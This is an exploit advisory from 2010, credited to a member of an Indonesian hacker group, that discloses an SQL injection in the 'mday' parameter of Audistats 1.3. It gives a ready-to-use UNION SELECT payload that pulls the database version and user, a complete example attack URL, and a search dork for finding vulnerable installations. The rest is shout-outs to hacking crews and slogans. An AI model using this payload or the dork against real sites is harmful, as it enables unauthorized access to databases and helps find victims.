54 lines
No EOL
1.9 KiB
Text
54 lines
No EOL
1.9 KiB
Text
###################################################################################
|
|
#
|
|
[~] Audistats SQL injection vulnerability - (mday) #
|
|
[~] Author : kaMtiEz (kamzcrew@yahoo.com) #
|
|
[~] Homepage : http://www.indonesiancoder.com #
|
|
[~] Date : January 29, 2010 #
|
|
#
|
|
###################################################################################
|
|
|
|
[ Software Information ]
|
|
|
|
[+] Vendor : http://adubus.free.fr/audistat/
|
|
[+] Download : http://adubus.free.fr/audistat/
|
|
[+] version : 1.3 or lower maybe also affected
|
|
[+] Vulnerability : SQL injection
|
|
[+] Dork : "Think iT"
|
|
[+] Price : -
|
|
[+] Location : INDONESIA - JOGJA
|
|
|
|
##################################################################################
|
|
|
|
|
|
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
|
|
|
|
[ Vulnerable File ]
|
|
|
|
http://127.0.0.1/[kaMtiEz]/?year=kaMtiEz&month=tukulesto&mday=[INDONESIANCODER]
|
|
|
|
[ Exploit ]
|
|
|
|
-666+union+all+select+@@version,user()--
|
|
|
|
[ Example ]
|
|
|
|
http://[server]/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user()--
|
|
|
|
===========================================================================
|
|
|
|
[ Thx TO ]
|
|
|
|
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
|
|
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
|
|
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z
|
|
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck
|
|
|
|
[ NOTE ]
|
|
|
|
[+] Belajar Belajar Dan Belajar !!
|
|
[+] Jack im commiinnggggggggggggggggggggggggggggggggg .. ^_^
|
|
|
|
[ QUOTE ]
|
|
|
|
[+] we are not dead INDONESIANCODER stil r0x
|
|
[+] nothing secure .. |